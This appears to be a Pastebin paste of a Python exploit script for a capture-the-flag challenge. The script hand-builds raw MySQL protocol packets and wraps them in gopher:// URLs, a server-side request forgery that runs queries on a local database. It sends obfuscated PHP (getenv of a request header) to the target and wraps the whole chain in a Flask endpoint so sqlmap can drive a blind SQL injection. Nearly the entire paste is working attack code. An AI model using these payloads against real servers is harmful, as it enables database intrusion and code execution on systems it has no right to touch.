Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #coding: utf-8
- import requests
- class MySQL():
- print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m"
- user = 'admin' #raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
- encode_user = user.encode("hex")
- user_length = len(user)
- temp = user_length - 4
- length = (chr(0xa3+temp)).encode("hex")
- dump = length + "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
- dump += encode_user
- dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
- dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
- dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
- query = "show databases;";#raw_input("\033[96m" +"Give query to execute: "+ "\033[0m")
- auth = dump.replace("\n","")
- def encode(self, s):
- a = [s[i:i + 2] for i in range(0, len(s), 2)]
- #return "gopher://127.0.0.1:3306/_%" + "%".join(a)
- return "gopher://127.0.0.1:8787/_%" + "%".join(a)
- def get_payload(self, query):
- if(query.strip()!=''):
- query = query.encode("hex")
- query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
- query_length = query_length.decode('hex')[::-1].encode('hex')
- pay1 = query_length + "0003" + query
- final = self.encode(self.auth + pay1 + "0100000001")
- return final
- else:
- return encode(self.auth)
- # coding: utf-8
- from flask import Flask, render_template, request
- app = Flask(__name__, template_folder='.')
- import time
- @app.route('/')
- def blind():
- username = request.args.get('username')
- url = "http://localhost/gg.php"
- url = "http://warmup.balsnctf.com/"
- def n(s):
- r = ""
- for i in s:
- r += chr(~(ord(i)) & 0xFF)
- r = "~{}".format(r)
- return r
- t = '(' + n('getenv') + ')(' +n('HTTP_X') + ')'
- # x = MySQL().get_payload("select IF(TRUE AND (select '1'='{username}'), sleep(10), sleep(0));".format(username=username))
- x = MySQL().get_payload("select id from (select 1 as id)a where id='{username}';".format(username=username))
- print repr(x)
- print len(t)
- try:
- r = requests.post(url=url, params = {
- 'op' : '-9',
- 'Σ>―(#°ω°#)♡→' : t
- },
- cookies = {"PHPSESSID" : "123"},
- headers = {"X": x},
- timeout = 1.5
- )
- return "1"
- except:
- time.sleep(4)
- return "0"
- return r.content
- if __name__ == "__main__":
- app.run(host='0.0.0.0', debug=True)
- '''
- python sqlmap.py -u "http://localhost:5000/?username=*" --technique=T --dbms=mysql --dbs --level 1 --time-sec=2
- '''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement